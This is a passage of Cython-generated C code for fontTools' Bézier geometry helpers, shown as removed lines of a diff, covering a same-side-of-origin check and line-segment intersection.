*__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin, "_both_points_are_on_same_side_of_origin(a, b, origin)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin = {"_both_points_are_on_same_side_of_origin", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_origin = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_both_points_are_on_same_side_of_origin (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_origin,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, 1); __PYX_ERR(0, 1141, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_origin)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1141, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, 2); __PYX_ERR(0, 1141, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_both_points_are_on_same_side_of_origin") < 0)) __PYX_ERR(0, 1141, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_origin = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_both_points_are_on_same_side_of_origin", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1141, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._both_points_are_on_same_side_of_origin", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_origin); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_origin) { - PyObject *__pyx_v_xDiff = NULL; - PyObject *__pyx_v_yDiff = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_t_6; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_both_points_are_on_same_side_of_origin", 1); - - /* "fontTools/misc/bezierTools.py":1142 - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) # <<<<<<<<<<<<<< - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - * return not (xDiff <= 0.0 and yDiff <= 0.0) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_origin, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_b, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_origin, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Subtract(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1142, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_v_xDiff = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1143 - * def _both_points_are_on_same_side_of_origin(a, b, origin): - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) # <<<<<<<<<<<<<< - * return not (xDiff <= 0.0 and yDiff <= 0.0) - * - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_origin, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_origin, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_yDiff = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1144 - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - * return not (xDiff <= 0.0 and yDiff <= 0.0) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyObject_RichCompare(__pyx_v_xDiff, __pyx_float_0_0, Py_LE); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_6) { - } else { - __pyx_t_5 = __pyx_t_6; - goto __pyx_L3_bool_binop_done; - } - __pyx_t_1 = PyObject_RichCompare(__pyx_v_yDiff, __pyx_float_0_0, Py_LE); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_6; - __pyx_L3_bool_binop_done:; - __pyx_t_1 = __Pyx_PyBool_FromLong((!__pyx_t_5)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools._both_points_are_on_same_side_of_origin", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_xDiff); - __Pyx_XDECREF(__pyx_v_yDiff); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_72lineLineIntersections, "lineLineIntersections(s1, e1, s2, e2)\nFinds intersections between two line segments.\n\n Args:\n s1, e1: Coordinates of the first line as 2D tuples.\n s2, e2: Coordinates of the second line as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n\n >>> a = lineLineIntersections( (310,389), (453, 222), (289, 251), (447, 367))\n >>> len(a)\n 1\n >>> intersection = a[0]\n >>> intersection.pt\n (374.44882952482897, 313.73458370177315)\n >>> (intersection.t1, intersection.t2)\n (0.45069111555824465, 0.5408153767394238)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_73lineLineIntersections = {"lineLineIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_72lineLineIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_s1 = 0; - PyObject *__pyx_v_e1 = 0; - PyObject *__pyx_v_s2 = 0; - PyObject *__pyx_v_e2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("lineLineIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_s1,&__pyx_n_s_e1,&__pyx_n_s_s2,&__pyx_n_s_e2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 1); __PYX_ERR(0, 1147, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 2); __PYX_ERR(0, 1147, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 3); __PYX_ERR(0, 1147, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lineLineIntersections") < 0)) __PYX_ERR(0, 1147, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_s1 = values[0]; - __pyx_v_e1 = values[1]; - __pyx_v_s2 = values[2]; - __pyx_v_e2 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 1147, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.lineLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(__pyx_self, __pyx_v_s1, __pyx_v_e1, __pyx_v_s2, __pyx_v_e2); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s1, PyObject *__pyx_v_e1, PyObject *__pyx_v_s2, PyObject *__pyx_v_e2) { - PyObject *__pyx_v_s1x = NULL; - PyObject *__pyx_v_s1y = NULL; - PyObject *__pyx_v_e1x = NULL; - PyObject *__pyx_v_e1y = NULL; - PyObject *__pyx_v_s2x = NULL; - PyObject *__pyx_v_s2y = NULL; - PyObject *__pyx_v_e2x = NULL; - PyObject *__pyx_v_e2y = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_slope34 = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_v_pt = NULL; - PyObject *__pyx_v_slope12 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_t_6; - int __pyx_t_7; - int __pyx_t_8; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("lineLineIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1170 - * (0.45069111555824465, 0.5408153767394238) - * """ - * s1x, s1y = s1 # <<<<<<<<<<<<<< - * e1x, e1y = e1 - * s2x, s2y = s2 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s1))) || (PyList_CheckExact(__pyx_v_s1))) { - PyObject* sequence = __pyx_v_s1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1170, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1170, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1170, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_s1x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_s1y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1171 - * """ - * s1x, s1y = s1 - * e1x, e1y = e1 # <<<<<<<<<<<<<< - * s2x, s2y = s2 - * e2x, e2y = e2 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e1))) || (PyList_CheckExact(__pyx_v_e1))) { - PyObject* sequence = __pyx_v_e1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1171, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1171, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1171, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_e1x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_e1y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1172 - * s1x, s1y = s1 - * e1x, e1y = e1 - * s2x, s2y = s2 # <<<<<<<<<<<<<< - * e2x, e2y = e2 - * if ( - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s2))) || (PyList_CheckExact(__pyx_v_s2))) { - PyObject* sequence = __pyx_v_s2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1172, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = 